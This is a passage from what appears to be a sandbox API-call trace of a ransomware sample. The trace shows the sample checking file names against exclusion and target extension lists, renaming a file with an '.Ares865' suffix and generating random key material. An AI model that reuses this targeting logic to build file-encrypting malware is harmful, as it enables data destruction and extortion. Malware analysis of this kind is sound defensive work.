lpString2="8E4E510F44A56B8C8ECFEC352907C373_411140098D71F028134E9B8A21255C61" | out: lpString1="8E4E510F44A56B8C8ECFEC352907C373_411140098D71F028134E9B8A21255C61") returned="8E4E510F44A56B8C8ECFEC352907C373_411140098D71F028134E9B8A21255C61" [0110.553] lstrlenW (lpString="8E4E510F44A56B8C8ECFEC352907C373_411140098D71F028134E9B8A21255C61") returned 65 [0110.553] lstrlenW (lpString="Ares865") returned 7 [0110.553] lstrcmpiW (lpString1="1255C61", lpString2="Ares865") returned -1 [0110.554] lstrlenW (lpString=".dll") returned 4 [0110.554] lstrcmpiW (lpString1="8E4E510F44A56B8C8ECFEC352907C373_411140098D71F028134E9B8A21255C61", lpString2=".dll") returned 1 [0110.554] lstrlenW (lpString=".lnk") returned 4 [0110.554] lstrcmpiW (lpString1="8E4E510F44A56B8C8ECFEC352907C373_411140098D71F028134E9B8A21255C61", lpString2=".lnk") returned 1 [0110.554] lstrlenW (lpString=".ini") returned 4 [0110.554] lstrcmpiW (lpString1="8E4E510F44A56B8C8ECFEC352907C373_411140098D71F028134E9B8A21255C61", lpString2=".ini") returned 1 [0110.554] lstrlenW (lpString=".sys") returned 4 [0110.554] lstrcmpiW (lpString1="8E4E510F44A56B8C8ECFEC352907C373_411140098D71F028134E9B8A21255C61", lpString2=".sys") returned 1 [0110.554] lstrlenW (lpString="8E4E510F44A56B8C8ECFEC352907C373_411140098D71F028134E9B8A21255C61") returned 65 [0110.554] lstrlenW (lpString="bak") returned 3 [0110.554] lstrcmpiW (lpString1="C61", lpString2="bak") returned 1 [0110.554] lstrlenW (lpString="ba_") returned 3 [0110.554] lstrcmpiW (lpString1="C61", lpString2="ba_") returned 1 [0110.554] lstrlenW (lpString="dbb") returned 3 [0110.554] lstrcmpiW (lpString1="C61", lpString2="dbb") returned -1 [0110.554] lstrlenW (lpString="vmdk") returned 4 [0110.554] lstrcmpiW (lpString1="5C61", lpString2="vmdk") returned -1 [0110.554] lstrlenW (lpString="rar") returned 3 [0110.554] lstrcmpiW (lpString1="C61", lpString2="rar") returned -1 [0110.554] lstrlenW (lpString="zip") returned 3 [0110.554] lstrcmpiW (lpString1="C61", lpString2="zip") returned -1 [0110.554] lstrlenW (lpString="tgz") returned 3 [0110.554] lstrcmpiW (lpString1="C61", lpString2="tgz") returned -1 [0110.554] lstrlenW (lpString="vbox") returned 4 [0110.554] lstrcmpiW (lpString1="5C61", lpString2="vbox") returned -1 [0110.554] lstrlenW (lpString="vdi") returned 3 [0110.554] lstrcmpiW (lpString1="C61", lpString2="vdi") returned -1 [0110.554] lstrlenW (lpString="vhd") returned 3 [0110.554] lstrcmpiW (lpString1="C61", lpString2="vhd") returned -1 [0110.554] lstrlenW (lpString="vhdx") returned 4 [0110.554] lstrcmpiW (lpString1="5C61", lpString2="vhdx") returned -1 [0110.554] lstrlenW (lpString="avhd") returned 4 [0110.554] lstrcmpiW (lpString1="5C61", lpString2="avhd") returned -1 [0110.555] lstrlenW (lpString="db") returned 2 [0110.555] lstrcmpiW (lpString1="61", lpString2="db") returned -1 [0110.555] lstrlenW (lpString="db2") returned 3 [0110.555] lstrcmpiW (lpString1="C61", lpString2="db2") returned -1 [0110.555] lstrlenW (lpString="db3") returned 3 [0110.555] lstrcmpiW (lpString1="C61", lpString2="db3") returned -1 [0110.555] lstrlenW (lpString="dbf") returned 3 [0110.555] lstrcmpiW (lpString1="C61", lpString2="dbf") returned -1 [0110.555] lstrlenW (lpString="mdf") returned 3 [0110.555] lstrcmpiW (lpString1="C61", lpString2="mdf") returned -1 [0110.555] lstrlenW (lpString="mdb") returned 3 [0110.555] lstrcmpiW (lpString1="C61", lpString2="mdb") returned -1 [0110.555] lstrlenW (lpString="sql") returned 3 [0110.555] lstrcmpiW (lpString1="C61", lpString2="sql") returned -1 [0110.555] lstrlenW (lpString="sqlite") returned 6 [0110.555] lstrcmpiW (lpString1="255C61", lpString2="sqlite") returned -1 [0110.555] lstrlenW (lpString="sqlite3") returned 7 [0110.555] lstrcmpiW (lpString1="1255C61", lpString2="sqlite3") returned -1 [0110.555] lstrlenW (lpString="sqlitedb") returned 8 [0110.555] lstrcmpiW (lpString1="21255C61", lpString2="sqlitedb") returned -1 [0110.555] lstrlenW (lpString="xml") returned 3 [0110.555] lstrcmpiW (lpString1="C61", lpString2="xml") returned -1 [0110.555] lstrlenW (lpString="$er") returned 3 [0110.555] lstrcmpiW (lpString1="C61", lpString2="$er") returned 1 [0110.555] lstrlenW (lpString="4dd") returned 3 [0110.555] lstrcmpiW (lpString1="C61", lpString2="4dd") returned 1 [0110.555] lstrlenW (lpString="4dl") returned 3 [0110.555] lstrcmpiW (lpString1="C61", lpString2="4dl") returned 1 [0110.555] lstrlenW (lpString="^^^") returned 3 [0110.555] lstrcmpiW (lpString1="C61", lpString2="^^^") returned 1 [0110.555] lstrlenW (lpString="abs") returned 3 [0110.555] lstrcmpiW (lpString1="C61", lpString2="abs") returned 1 [0110.555] lstrlenW (lpString="abx") returned 3 [0110.555] lstrcmpiW (lpString1="C61", lpString2="abx") returned 1 [0110.556] lstrlenW (lpString="accdb") returned 5 [0110.556] lstrcmpiW (lpString1="55C61", lpString2="accdb") returned -1 [0110.556] lstrlenW (lpString="accdc") returned 5 [0110.556] lstrcmpiW (lpString1="55C61", lpString2="accdc") returned -1 [0110.556] lstrlenW (lpString="accde") returned 5 [0110.556] lstrcmpiW (lpString1="55C61", lpString2="accde") returned -1 [0110.556] lstrlenW (lpString="accdr") returned 5 [0110.556] lstrcmpiW (lpString1="55C61", lpString2="accdr") returned -1 [0110.556] lstrlenW (lpString="accdt") returned 5 [0110.556] lstrcmpiW (lpString1="55C61", lpString2="accdt") returned -1 [0110.556] lstrlenW (lpString="accdw") returned 5 [0110.556] lstrcmpiW (lpString1="55C61", lpString2="accdw") returned -1 [0110.556] lstrlenW (lpString="accft") returned 5 [0110.556] lstrcmpiW (lpString1="55C61", lpString2="accft") returned -1 [0110.556] lstrlenW (lpString="adb") returned 3 [0110.556] lstrcmpiW (lpString1="C61", lpString2="adb") returned 1 [0110.556] lstrlenW (lpString="adb") returned 3 [0110.556] lstrcmpiW (lpString1="C61", lpString2="adb") returned 1 [0110.556] lstrlenW (lpString="ade") returned 3 [0110.556] lstrcmpiW (lpString1="C61", lpString2="ade") returned 1 [0110.556] lstrlenW (lpString="adf") returned 3 [0110.556] lstrcmpiW (lpString1="C61", lpString2="adf") returned 1 [0110.556] lstrlenW (lpString="adn") returned 3 [0110.556] lstrcmpiW (lpString1="C61", lpString2="adn") returned 1 [0110.556] lstrlenW (lpString="adp") returned 3 [0110.556] lstrcmpiW (lpString1="C61", lpString2="adp") returned 1 [0110.556] lstrlenW (lpString="alf") returned 3 [0110.556] lstrcmpiW (lpString1="C61", lpString2="alf") returned 1 [0110.556] lstrlenW (lpString="ask") returned 3 [0110.556] lstrcmpiW (lpString1="C61", lpString2="ask") returned 1 [0110.556] lstrlenW (lpString="btr") returned 3 [0110.556] lstrcmpiW (lpString1="C61", lpString2="btr") returned 1 [0110.556] lstrlenW (lpString="cat") returned 3 [0110.556] lstrcmpiW (lpString1="C61", lpString2="cat") returned -1 [0110.557] lstrlenW (lpString="cdb") returned 3 [0110.557] lstrcmpiW (lpString1="C61", lpString2="cdb") returned -1 [0110.557] lstrlenW (lpString="ckp") returned 3 [0110.557] lstrcmpiW (lpString1="C61", lpString2="ckp") returned -1 [0110.557] lstrlenW (lpString="cma") returned 3 [0110.557] lstrcmpiW (lpString1="C61", lpString2="cma") returned -1 [0110.557] lstrlenW (lpString="cpd") returned 3 [0110.557] lstrcmpiW (lpString1="C61", lpString2="cpd") returned -1 [0110.557] lstrlenW (lpString="dacpac") returned 6 [0110.557] lstrcmpiW (lpString1="255C61", lpString2="dacpac") returned -1 [0110.557] lstrlenW (lpString="dad") returned 3 [0110.557] lstrcmpiW (lpString1="C61", lpString2="dad") returned -1 [0110.557] lstrlenW (lpString="dadiagrams") returned 10 [0110.557] lstrcmpiW (lpString1="8A21255C61", lpString2="dadiagrams") returned -1 [0110.557] lstrlenW (lpString="daschema") returned 8 [0110.557] lstrcmpiW (lpString1="21255C61", lpString2="daschema") returned -1 [0110.557] lstrlenW (lpString="db-journal") returned 10 [0110.557] lstrcmpiW (lpString1="8A21255C61", lpString2="db-journal") returned -1 [0110.557] lstrlenW (lpString="db-shm") returned 6 [0110.557] lstrcmpiW (lpString1="255C61", lpString2="db-shm") returned -1 [0110.557] lstrlenW (lpString="db-wal") returned 6 [0110.557] lstrcmpiW (lpString1="255C61", lpString2="db-wal") returned -1 [0110.557] lstrlenW (lpString="dbc") returned 3 [0110.557] lstrcmpiW (lpString1="C61", lpString2="dbc") returned -1 [0110.557] lstrlenW (lpString="dbs") returned 3 [0110.557] lstrcmpiW (lpString1="C61", lpString2="dbs") returned -1 [0110.557] lstrlenW (lpString="dbt") returned 3 [0110.557] lstrcmpiW (lpString1="C61", lpString2="dbt") returned -1 [0110.557] lstrlenW (lpString="dbv") returned 3 [0110.557] lstrcmpiW (lpString1="C61", lpString2="dbv") returned -1 [0110.557] lstrlenW (lpString="dbx") returned 3 [0110.557] lstrcmpiW (lpString1="C61", lpString2="dbx") returned -1 [0110.557] lstrlenW (lpString="dcb") returned 3 [0110.557] lstrcmpiW (lpString1="C61", lpString2="dcb") returned -1 [0110.558] lstrlenW (lpString="dct") returned 3 [0110.558] lstrcmpiW (lpString1="C61", lpString2="dct") returned -1 [0110.558] lstrlenW (lpString="dcx") returned 3 [0110.558] lstrcmpiW (lpString1="C61", lpString2="dcx") returned -1 [0110.558] lstrlenW (lpString="ddl") returned 3 [0110.558] lstrcmpiW (lpString1="C61", lpString2="ddl") returned -1 [0110.558] lstrlenW (lpString="dlis") returned 4 [0110.558] lstrcmpiW (lpString1="5C61", lpString2="dlis") returned -1 [0110.558] lstrlenW (lpString="dp1") returned 3 [0110.558] lstrcmpiW (lpString1="C61", lpString2="dp1") returned -1 [0110.558] lstrlenW (lpString="dqy") returned 3 [0110.558] lstrcmpiW (lpString1="C61", lpString2="dqy") returned -1 [0110.558] lstrlenW (lpString="dsk") returned 3 [0110.558] lstrcmpiW (lpString1="C61", lpString2="dsk") returned -1 [0110.558] lstrlenW (lpString="dsn") returned 3 [0110.558] lstrcmpiW (lpString1="C61", lpString2="dsn") returned -1 [0110.558] lstrlenW (lpString="dtsx") returned 4 [0110.558] lstrcmpiW (lpString1="5C61", lpString2="dtsx") returned -1 [0110.558] lstrlenW (lpString="dxl") returned 3 [0110.558] lstrcmpiW (lpString1="C61", lpString2="dxl") returned -1 [0110.558] lstrlenW (lpString="eco") returned 3 [0110.558] lstrcmpiW (lpString1="C61", lpString2="eco") returned -1 [0110.558] lstrlenW (lpString="ecx") returned 3 [0110.558] lstrcmpiW (lpString1="C61", lpString2="ecx") returned -1 [0110.558] lstrlenW (lpString="edb") returned 3 [0110.558] lstrcmpiW (lpString1="C61", lpString2="edb") returned -1 [0110.558] lstrlenW (lpString="epim") returned 4 [0110.558] lstrcmpiW (lpString1="5C61", lpString2="epim") returned -1 [0110.558] lstrlenW (lpString="fcd") returned 3 [0110.558] lstrcmpiW (lpString1="C61", lpString2="fcd") returned -1 [0110.558] lstrlenW (lpString="fdb") returned 3 [0110.558] lstrcmpiW (lpString1="C61", lpString2="fdb") returned -1 [0110.558] lstrlenW (lpString="fic") returned 3 [0110.558] lstrcmpiW (lpString1="C61", lpString2="fic") returned -1 [0110.559] lstrlenW (lpString="flexolibrary") returned 12 [0110.559] lstrcmpiW (lpString1="9B8A21255C61", lpString2="flexolibrary") returned -1 [0110.559] lstrlenW (lpString="fm5") returned 3 [0110.559] lstrcmpiW (lpString1="C61", lpString2="fm5") returned -1 [0110.559] lstrlenW (lpString="fmp") returned 3 [0110.559] lstrcmpiW (lpString1="C61", lpString2="fmp") returned -1 [0110.559] lstrlenW (lpString="fmp12") returned 5 [0110.559] lstrcmpiW (lpString1="55C61", lpString2="fmp12") returned -1 [0110.559] lstrlenW (lpString="fmpsl") returned 5 [0110.559] lstrcmpiW (lpString1="55C61", lpString2="fmpsl") returned -1 [0110.559] lstrlenW (lpString="fol") returned 3 [0110.559] lstrcmpiW (lpString1="C61", lpString2="fol") returned -1 [0110.559] lstrlenW (lpString="fp3") returned 3 [0110.559] lstrcmpiW (lpString1="C61", lpString2="fp3") returned -1 [0110.559] lstrlenW (lpString="fp4") returned 3 [0110.559] lstrcmpiW (lpString1="C61", lpString2="fp4") returned -1 [0110.559] lstrlenW (lpString="fp5") returned 3 [0110.559] lstrcmpiW (lpString1="C61", lpString2="fp5") returned -1 [0110.559] lstrlenW (lpString="fp7") returned 3 [0110.559] lstrcmpiW (lpString1="C61", lpString2="fp7") returned -1 [0110.559] lstrlenW (lpString="fpt") returned 3 [0110.559] lstrcmpiW (lpString1="C61", lpString2="fpt") returned -1 [0110.559] lstrlenW (lpString="frm") returned 3 [0110.559] lstrcmpiW (lpString1="C61", lpString2="frm") returned -1 [0110.559] lstrlenW (lpString="gdb") returned 3 [0110.559] lstrcmpiW (lpString1="C61", lpString2="gdb") returned -1 [0110.559] lstrlenW (lpString="gdb") returned 3 [0110.559] lstrcmpiW (lpString1="C61", lpString2="gdb") returned -1 [0110.559] lstrlenW (lpString="grdb") returned 4 [0110.559] lstrcmpiW (lpString1="5C61", lpString2="grdb") returned -1 [0110.559] lstrlenW (lpString="gwi") returned 3 [0110.559] lstrcmpiW (lpString1="C61", lpString2="gwi") returned -1 [0110.559] lstrlenW (lpString="hdb") returned 3 [0110.559] lstrcmpiW (lpString1="C61", lpString2="hdb") returned -1 [0110.559] lstrlenW (lpString="his") returned 3 [0110.560] lstrcmpiW (lpString1="C61", lpString2="his") returned -1 [0110.560] lstrlenW (lpString="ib") returned 2 [0110.560] lstrcmpiW (lpString1="61", lpString2="ib") returned -1 [0110.560] lstrlenW (lpString="idb") returned 3 [0110.560] lstrcmpiW (lpString1="C61", lpString2="idb") returned -1 [0110.560] lstrlenW (lpString="ihx") returned 3 [0110.560] lstrcmpiW (lpString1="C61", lpString2="ihx") returned -1 [0110.560] lstrlenW (lpString="itdb") returned 4 [0110.560] lstrcmpiW (lpString1="5C61", lpString2="itdb") returned -1 [0110.560] lstrlenW (lpString="itw") returned 3 [0110.560] lstrcmpiW (lpString1="C61", lpString2="itw") returned -1 [0110.560] lstrlenW (lpString="jet") returned 3 [0110.560] lstrcmpiW (lpString1="C61", lpString2="jet") returned -1 [0110.560] lstrlenW (lpString="jtx") returned 3 [0110.560] lstrcmpiW (lpString1="C61", lpString2="jtx") returned -1 [0110.560] lstrlenW (lpString="kdb") returned 3 [0110.560] lstrcmpiW (lpString1="C61", lpString2="kdb") returned -1 [0110.560] lstrlenW (lpString="kexi") returned 4 [0110.560] lstrcmpiW (lpString1="5C61", lpString2="kexi") returned -1 [0110.560] lstrlenW (lpString="kexic") returned 5 [0110.560] lstrcmpiW (lpString1="55C61", lpString2="kexic") returned -1 [0110.560] lstrlenW (lpString="kexis") returned 5 [0110.560] lstrcmpiW (lpString1="55C61", lpString2="kexis") returned -1 [0110.560] lstrlenW (lpString="lgc") returned 3 [0110.560] lstrcmpiW (lpString1="C61", lpString2="lgc") returned -1 [0110.560] lstrlenW (lpString="lwx") returned 3 [0110.560] lstrcmpiW (lpString1="C61", lpString2="lwx") returned -1 [0110.560] lstrlenW (lpString="maf") returned 3 [0110.560] lstrcmpiW (lpString1="C61", lpString2="maf") returned -1 [0110.560] lstrlenW (lpString="maq") returned 3 [0110.560] lstrcmpiW (lpString1="C61", lpString2="maq") returned -1 [0110.560] lstrlenW (lpString="mar") returned 3 [0110.560] lstrcmpiW (lpString1="C61", lpString2="mar") returned -1 [0110.560] lstrlenW (lpString="marshal") returned 7 [0110.561] lstrcmpiW (lpString1="1255C61", lpString2="marshal") returned -1 [0110.561] lstrlenW (lpString="mas") returned 3 [0110.561] lstrcmpiW (lpString1="C61", lpString2="mas") returned -1 [0110.561] lstrlenW (lpString="mav") returned 3 [0110.561] lstrcmpiW (lpString1="C61", lpString2="mav") returned -1 [0110.561] lstrlenW (lpString="maw") returned 3 [0110.561] lstrcmpiW (lpString1="C61", lpString2="maw") returned -1 [0110.561] lstrlenW (lpString="mdbhtml") returned 7 [0110.561] lstrcmpiW (lpString1="1255C61", lpString2="mdbhtml") returned -1 [0110.561] lstrlenW (lpString="mdn") returned 3 [0110.561] lstrcmpiW (lpString1="C61", lpString2="mdn") returned -1 [0110.561] lstrlenW (lpString="mdt") returned 3 [0110.561] lstrcmpiW (lpString1="C61", lpString2="mdt") returned -1 [0110.561] lstrlenW (lpString="mfd") returned 3 [0110.561] lstrcmpiW (lpString1="C61", lpString2="mfd") returned -1 [0110.561] lstrlenW (lpString="mpd") returned 3 [0110.561] lstrcmpiW (lpString1="C61", lpString2="mpd") returned -1 [0110.561] lstrlenW (lpString="mrg") returned 3 [0110.561] lstrcmpiW (lpString1="C61", lpString2="mrg") returned -1 [0110.561] lstrlenW (lpString="mud") returned 3 [0110.561] lstrcmpiW (lpString1="C61", lpString2="mud") returned -1 [0110.561] lstrlenW (lpString="mwb") returned 3 [0110.561] lstrcmpiW (lpString1="C61", lpString2="mwb") returned -1 [0110.561] lstrlenW (lpString="myd") returned 3 [0110.561] lstrcmpiW (lpString1="C61", lpString2="myd") returned -1 [0110.561] lstrlenW (lpString="ndf") returned 3 [0110.561] lstrcmpiW (lpString1="C61", lpString2="ndf") returned -1 [0110.561] lstrlenW (lpString="nnt") returned 3 [0110.561] lstrcmpiW (lpString1="C61", lpString2="nnt") returned -1 [0110.561] lstrlenW (lpString="nrmlib") returned 6 [0110.561] lstrcmpiW (lpString1="255C61", lpString2="nrmlib") returned -1 [0110.561] lstrlenW (lpString="ns2") returned 3 [0110.562] lstrcmpiW (lpString1="C61", lpString2="ns2") returned -1 [0110.562] lstrlenW (lpString="ns3") returned 3 [0110.562] lstrcmpiW (lpString1="C61", lpString2="ns3") returned -1 [0110.562] lstrlenW (lpString="ns4") returned 3 [0110.562] lstrcmpiW (lpString1="C61", lpString2="ns4") returned -1 [0110.562] lstrlenW (lpString="nsf") returned 3 [0110.562] lstrcmpiW (lpString1="C61", lpString2="nsf") returned -1 [0110.562] lstrlenW (lpString="nv") returned 2 [0110.562] lstrcmpiW (lpString1="61", lpString2="nv") returned -1 [0110.562] lstrlenW (lpString="nv2") returned 3 [0110.562] lstrcmpiW (lpString1="C61", lpString2="nv2") returned -1 [0110.562] lstrlenW (lpString="nwdb") returned 4 [0110.562] lstrcmpiW (lpString1="5C61", lpString2="nwdb") returned -1 [0110.562] lstrlenW (lpString="nyf") returned 3 [0110.562] lstrcmpiW (lpString1="C61", lpString2="nyf") returned -1 [0110.562] lstrlenW (lpString="odb") returned 3 [0110.562] lstrcmpiW (lpString1="C61", lpString2="odb") returned -1 [0110.562] lstrlenW (lpString="odb") returned 3 [0110.562] lstrcmpiW (lpString1="C61", lpString2="odb") returned -1 [0110.562] lstrlenW (lpString="oqy") returned 3 [0110.562] lstrcmpiW (lpString1="C61", lpString2="oqy") returned -1 [0110.562] lstrlenW (lpString="ora") returned 3 [0110.562] lstrcmpiW (lpString1="C61", lpString2="ora") returned -1 [0110.562] lstrlenW (lpString="orx") returned 3 [0110.562] lstrcmpiW (lpString1="C61", lpString2="orx") returned -1 [0110.562] lstrlenW (lpString="owc") returned 3 [0110.562] lstrcmpiW (lpString1="C61", lpString2="owc") returned -1 [0110.562] lstrlenW (lpString="p96") returned 3 [0110.562] lstrcmpiW (lpString1="C61", lpString2="p96") returned -1 [0110.562] lstrlenW (lpString="p97") returned 3 [0110.562] lstrcmpiW (lpString1="C61", lpString2="p97") returned -1 [0110.562] lstrlenW (lpString="pan") returned 3 [0110.562] lstrcmpiW (lpString1="C61", lpString2="pan") returned -1 [0110.562] lstrlenW (lpString="pdb") returned 3 [0110.563] lstrcmpiW (lpString1="C61", lpString2="pdb") returned -1 [0110.563] lstrlenW (lpString="pdm") returned 3 [0110.563] lstrcmpiW (lpString1="C61", lpString2="pdm") returned -1 [0110.563] lstrlenW (lpString="pnz") returned 3 [0110.563] lstrcmpiW (lpString1="C61", lpString2="pnz") returned -1 [0110.563] lstrlenW (lpString="qry") returned 3 [0110.563] lstrcmpiW (lpString1="C61", lpString2="qry") returned -1 [0110.563] lstrlenW (lpString="qvd") returned 3 [0110.563] lstrcmpiW (lpString1="C61", lpString2="qvd") returned -1 [0110.563] lstrlenW (lpString="rbf") returned 3 [0110.563] lstrcmpiW (lpString1="C61", lpString2="rbf") returned -1 [0110.563] lstrlenW (lpString="rctd") returned 4 [0110.563] lstrcmpiW (lpString1="5C61", lpString2="rctd") returned -1 [0110.563] lstrlenW (lpString="rod") returned 3 [0110.563] lstrcmpiW (lpString1="C61", lpString2="rod") returned -1 [0110.563] lstrlenW (lpString="rodx") returned 4 [0110.563] lstrcmpiW (lpString1="5C61", lpString2="rodx") returned -1 [0110.563] lstrlenW (lpString="rpd") returned 3 [0110.563] lstrcmpiW (lpString1="C61", lpString2="rpd") returned -1 [0110.563] lstrlenW (lpString="rsd") returned 3 [0110.563] lstrcmpiW (lpString1="C61", lpString2="rsd") returned -1 [0110.563] lstrlenW (lpString="sas7bdat") returned 8 [0110.563] lstrcmpiW (lpString1="21255C61", lpString2="sas7bdat") returned -1 [0110.563] lstrlenW (lpString="sbf") returned 3 [0110.563] lstrcmpiW (lpString1="C61", lpString2="sbf") returned -1 [0110.563] lstrlenW (lpString="scx") returned 3 [0110.563] lstrcmpiW (lpString1="C61", lpString2="scx") returned -1 [0110.563] lstrlenW (lpString="sdb") returned 3 [0110.563] lstrcmpiW (lpString1="C61", lpString2="sdb") returned -1 [0110.563] lstrlenW (lpString="sdc") returned 3 [0110.563] lstrcmpiW (lpString1="C61", lpString2="sdc") returned -1 [0110.563] lstrlenW (lpString="sdf") returned 3 [0110.564] lstrcmpiW (lpString1="C61", lpString2="sdf") returned -1 [0110.564] lstrlenW (lpString="sis") returned 3 [0110.564] lstrcmpiW (lpString1="C61", lpString2="sis") returned -1 [0110.564] lstrlenW (lpString="spq") returned 3 [0110.564] lstrcmpiW (lpString1="C61", lpString2="spq") returned -1 [0110.564] lstrlenW (lpString="te") returned 2 [0110.564] lstrcmpiW (lpString1="61", lpString2="te") returned -1 [0110.564] lstrlenW (lpString="teacher") returned 7 [0110.564] lstrcmpiW (lpString1="1255C61", lpString2="teacher") returned -1 [0110.564] lstrlenW (lpString="tmd") returned 3 [0110.564] lstrcmpiW (lpString1="C61", lpString2="tmd") returned -1 [0110.564] lstrlenW (lpString="tps") returned 3 [0110.564] lstrcmpiW (lpString1="C61", lpString2="tps") returned -1 [0110.564] lstrlenW (lpString="trc") returned 3 [0110.564] lstrcmpiW (lpString1="C61", lpString2="trc") returned -1 [0110.564] lstrlenW (lpString="trc") returned 3 [0110.564] lstrcmpiW (lpString1="C61", lpString2="trc") returned -1 [0110.564] lstrlenW (lpString="trm") returned 3 [0110.564] lstrcmpiW (lpString1="C61", lpString2="trm") returned -1 [0110.564] lstrlenW (lpString="udb") returned 3 [0110.564] lstrcmpiW (lpString1="C61", lpString2="udb") returned -1 [0110.564] lstrlenW (lpString="udl") returned 3 [0110.564] lstrcmpiW (lpString1="C61", lpString2="udl") returned -1 [0110.564] lstrlenW (lpString="usr") returned 3 [0110.564] lstrcmpiW (lpString1="C61", lpString2="usr") returned -1 [0110.564] lstrlenW (lpString="v12") returned 3 [0110.564] lstrcmpiW (lpString1="C61", lpString2="v12") returned -1 [0110.564] lstrlenW (lpString="vis") returned 3 [0110.564] lstrcmpiW (lpString1="C61", lpString2="vis") returned -1 [0110.564] lstrlenW (lpString="vpd") returned 3 [0110.564] lstrcmpiW (lpString1="C61", lpString2="vpd") returned -1 [0110.564] lstrlenW (lpString="vvv") returned 3 [0110.564] lstrcmpiW (lpString1="C61", lpString2="vvv") returned -1 [0110.564] lstrlenW (lpString="wdb") returned 3 [0110.565] lstrcmpiW (lpString1="C61", lpString2="wdb") returned -1 [0110.565] lstrlenW (lpString="wmdb") returned 4 [0110.565] lstrcmpiW (lpString1="5C61", lpString2="wmdb") returned -1 [0110.565] lstrlenW (lpString="wrk") returned 3 [0110.565] lstrcmpiW (lpString1="C61", lpString2="wrk") returned -1 [0110.565] lstrlenW (lpString="xdb") returned 3 [0110.565] lstrcmpiW (lpString1="C61", lpString2="xdb") returned -1 [0110.565] lstrlenW (lpString="xld") returned 3 [0110.565] lstrcmpiW (lpString1="C61", lpString2="xld") returned -1 [0110.565] lstrlenW (lpString="xmlff") returned 5 [0110.565] lstrcmpiW (lpString1="55C61", lpString2="xmlff") returned -1 [0110.565] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8E4E510F44A56B8C8ECFEC352907C373_411140098D71F028134E9B8A21255C61.Ares865") returned 155 [0110.565] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8E4E510F44A56B8C8ECFEC352907C373_411140098D71F028134E9B8A21255C61" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\8e4e510f44a56b8c8ecfec352907c373_411140098d71f028134e9b8a21255c61"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8E4E510F44A56B8C8ECFEC352907C373_411140098D71F028134E9B8A21255C61.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\8e4e510f44a56b8c8ecfec352907c373_411140098d71f028134e9b8a21255c61.ares865"), dwFlags=0x1) returned 1 [0110.569] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8E4E510F44A56B8C8ECFEC352907C373_411140098D71F028134E9B8A21255C61.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\8e4e510f44a56b8c8ecfec352907c373_411140098d71f028134e9b8a21255c61.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0110.569] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1437) returned 1 [0110.569] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0110.569] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0110.569] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0110.569] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0110.570] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0110.570] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0110.572] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0110.573] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0110.573] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0110.574] lstrcpyW (in: lpString1=0x2cce4a4, lpString2="94308059B57B3142E455B38A6EB92015" | out: lpString1="94308059B57B3142E455B38A6EB92015") returned="94308059B57B3142E455B38A6EB92015" [0110.574] lstrlenW (lpString="94308059B57B3142E455B38A6EB92015") returned 32 [0110.574] lstrlenW (lpString="Ares865") returned 7 [0110.574] lstrcmpiW (lpString1="EB92015", lpString2="Ares865") returned 1 [0110.574] lstrlenW (lpString=".dll") returned 4 [0110.574] lstrcmpiW (lpString1="94308059B57B3142E455B38A6EB92015", lpString2=".dll") returned 1 [0110.574] lstrlenW (lpString=".lnk") returned 4 [0110.574] lstrcmpiW (lpString1="94308059B57B3142E455B38A6EB92015", lpString2=".lnk") returned 1 [0110.574] lstrlenW (lpString=".ini") returned 4 [0110.574] lstrcmpiW (lpString1="94308059B57B3142E455B38A6EB92015", lpString2=".ini") returned 1 [0110.574] lstrlenW (lpString=".sys") returned 4 [0110.574] lstrcmpiW (lpString1="94308059B57B3142E455B38A6EB92015", lpString2=".sys") returned 1 [0110.574] lstrlenW (lpString="94308059B57B3142E455B38A6EB92015") returned 32 [0110.574] lstrlenW (lpString="bak") returned 3 [0110.574] lstrcmpiW (lpString1="015", lpString2="bak") returned -1 [0110.574] lstrlenW (lpString="ba_") returned 3 [0110.574] lstrcmpiW (lpString1="015", lpString2="ba_") returned -1 [0110.574] lstrlenW (lpString="dbb") returned 3 [0110.574] lstrcmpiW (lpString1="015", lpString2="dbb") returned -1 [0110.574] lstrlenW (lpString="vmdk") returned 4 [0110.574] lstrcmpiW (lpString1="2015", lpString2="vmdk") returned -1 [0110.574] lstrlenW (lpString="rar") returned 3 [0110.574] lstrcmpiW (lpString1="015", lpString2="rar") returned -1 [0110.574] lstrlenW (lpString="zip") returned 3 [0110.574] lstrcmpiW (lpString1="015", lpString2="zip") returned -1 